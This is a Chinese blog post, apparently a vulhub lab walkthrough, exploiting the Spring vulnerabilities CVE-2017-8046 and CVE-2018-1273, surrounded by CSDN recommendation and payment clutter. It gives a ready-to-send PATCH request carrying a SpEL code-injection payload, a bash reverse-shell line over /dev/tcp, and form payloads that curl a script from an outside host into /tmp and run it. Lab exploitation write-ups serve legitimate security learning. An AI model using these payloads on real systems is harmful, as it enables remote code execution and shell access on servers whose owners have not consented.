Spring

最新推荐文章于 2024-10-16 10:11:07 发布
最新推荐文章于 2024-10-16 10:11:07 发布
阅读量363 收藏 7
点赞数 6
文章标签: spring java 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_69065643/article/details/140992979
版权

CVE-2017-8046

访问网站/customers/1 ,进入如下界面

抓包

PATCH /customers/1 HTTP/1.1
Host: 192.168.88.141:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json-patch+json
Content-Length: 202

[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname", "value": "vulhub" }]

查看是否创建成功

CVE-2018-1273

访问/users填写信息,抓包,发送到重放器

运行结果

进入容器查看成功写入

反弹shell

bash.sh文件内容为:

// 注意修改IP和端口
bash -i >& /dev/tcp/目标IP/2222 0>&1


 

将bash.sh上传到/root目录下,上述环境中已经提到如何操作,这里就不再赘述了,首先使用curl命令指定路径将bash.sh下载到目标主机/tmp/目录下:

// 下载文件
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("curl -o /tmp/bash.sh http://目标IP:9999/bash.sh")]=&password=&repeatedPassword=

在这里插入图片描述
在监听口可以知道文件已下载,开始执行命令:

// 执行.sh文件
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("bash /tmp/bash.sh")]=&password=&repeatedPassword=

 

养只小羊7
关注
2024最新首发,全网最全 Spring Boot 学习宝典(附思维导图)
**My Coding Family**
04-20 8万+
从0到1以知识点+实例+项目的教学模式对SpringBoot框架由浅入深进行学习,快来跟bug菌一起学习吧。
java Runtime.getRuntime().exec 调用系统脚本/命令注意事项
薛秋艳的博客
08-28 2万+
使用管道命令执行带密码执行sudo命令,在java中老是不成功今天找到方法解决了顺便整理了一下java Runtime.getRuntime().exec 调用脚本命令的注意事项。 使用管道命令执行带密码执行sudo命令 String cmds=“echo 'password' | sudo -S /usr/bin/pdf2htmlEX -h ”; 这个-S是读取前面的ech
JAVA代码执行CMD命令 RunTime.getRuntime().exec()
qq_34823218的博客
07-06 1万+
java中,RunTime.getRuntime().exec()实现了调用服务器命令脚本来执行功能需要。 用法: public Process exec(String command)-----在单独的进程中执行指定的字符串命令。 public Process exec(String [] cmdArray)---在单独的进程中执行指定命令和变量 public Process exec(String command, String [] envp)----在指定环境的独立...
java调用外部程序(Runtime.getRuntime().exec)详解
墨鸦的博客
04-29 3万+
参考:https://blog.csdn.net/tiantang_1986/article/details/51219916 ​ https://blog.csdn.net/km_moon/article/details/84751792 概述 Runtime.getRuntime().exec 用于调用外部可执行程序或系统命令,并重定向外部程序的标准输入、标准输出和标准错误到缓冲池。功能和windows“运行”类似。 格式: Process process = Runtime.getRuntime(
Spring一些基础问题整理
热门推荐
张彦峰的博客
04-07 169万+
Spring相关高频面试题整理
Spring系列一:spring的安装与使用
你好, 我在学java的博客
07-24 8656
Spring框架学习[上 50%]
深入解析Spring Batch:企业级批处理框架的技术之旅
码到三十五
02-19 2万+
Spring Batch是一个开源的、轻量级的批处理框架,它基于Spring框架构建,继承了Spring的诸多优点,如依赖注入、面向切面编程等。Spring Batch旨在简化批处理应用程序的开发,提供了一套丰富的功能来支持事务管理、作业调度、异常处理、日志记录等。Spring Batch是一个完善的批处理框架,旨在帮助企业建立健壮、高效的批处理应用。它是Spring的一个子项目,使用Java语言并基于Spring框架为基础开发,使得已经使用Spring框架的开发者或者企业更容易访问和利用企业服务。
Spring+Quartz实现定时任务的配置方法
yjclsx的博客
07-31 42万+
<?xml version="1.0" encoding="UTF-8"?> <beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:context="http://www.spring
Spring Boot 3.0:未来企业应用开发的基石
程序边界
05-22 6826
学习Spring Boot 3.0》详细阐述了与Spring Boot 3.0相关的基本解决方案,主要包括Spring Boot的核心功能、使用Spring Boot创建Web应用程序、使用Spring Boot查询数据、使用Spring Boot保护应用程序、使用Spring Boot进行测试、使用Spring Boot配置应用程序、使用Spring Boot发布应用程序、使用Spring Boot构建原生程序、编写响应式Web控制器、响应式处理数据等内容。
《滚雪球学Spring Boot》教程导航帖(更新于2024.06.20)
**My Coding Family**
06-29 4万+
《滚雪球学Spring Boot》是由CSDN博主bug菌创作的全面Spring Boot教程。作者是全栈开发专家,在多个技术社区如CSDN、掘金、InfoQ、51CTO等担任博客专家,并拥有超过30万的全网粉丝。该教程分为入门篇和进阶篇,每篇包含详细的教学步骤,涵盖Spring Boot的基础和高级主题。
Spring+SpringMVC+Mybatis框架整合例子(SSM) 下载
07-21
SpringSpringMVC和Mybatis是Java开发中最常用的三大开源框架,它们的整合使用,通常被称为SSM框架。这个框架组合提供了完整的后端服务解决方案,包括依赖注入(DI)、面向切面编程(AOP)、模型-视图-控制器(MVC...
SpringMVC+Spring+Mybatis集成开发环境
04-28
在IT行业中,SpringMVC、Spring和Mybatis是三大核心框架,它们的集成使用是Java Web开发中的常见实践。这个集成开发环境旨在提供一个高效、灵活的开发平台,以实现业务逻辑与数据访问的分离,提高代码的可维护性和可...
最新版本的Struts2+Spring4+Hibernate4框架整合
10-15
项目原型:Struts2.3.16 + Spring4.1.1 + Hibernate4.3.6 二、 项目目的: 整合使用最新版本的三大框架(即Struts2、Spring4和Hibernate4),搭建项目架构原型。 项目架构原型:Struts2.3.16 + Spring4.1.1 + ...
Spring+SpringMVC+MyBatis整合工程实例 完整版源码(带注释)
07-19
SSM框架整合是指SpringSpringMVC和MyBatis三个开源框架的集成,常用于构建企业级的Java Web应用程序。这三个框架各有其优势,Spring负责控制层,SpringMVC处理视图和业务逻辑,而MyBatis则专注于数据库操作。 **1...
Spring AI Java程序员的AI之Spring AI(二)
最新发布
qq1071643762的博客
10-16 716
Spring AI中,如果一个Bean实现了Function接口,那么它就是一个工具函数,并且通过@Description注解可以描述该工具的作用是什么,如果工具有需要接收参数,。
springboot 通过自定义注解方式动态控制日志级别进行日志的输出或者关闭
A_awen的博客
10-11 433
springboot 通过自定义注解方式动态控制日志级别进行日志的输出或者关闭
spring task的使用场景
qq_40603125的博客
10-13 288
spring任务调度框架约定的时间。
2024.10月12日--- SpringMVC异常处理
whisper_Java 的博客
10-12 913
*** 用户【】 IP[]* 在【时间】* 操作【Controller.find】 发生如下异常*/@OverrideSystem.out.println("---------执行了自定义异常处理器------------");// 根据不同的异常类型,设置不同的响应状态码// 可以添加更多的自定义处理逻辑//}else {// 记录日志或其他处理逻辑// 可以将异常信息放入模型中供视图展示。
Spring实践指南
"Spring in Practice" 是一本关于Spring框架的实践指南,类似于"Spring in Action",适合有一定英文基础的读者阅读。本书由Willie Wheeler和Joshua White合作撰写,覆盖了Spring 3版本的内容。 在Spring框架的实践...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值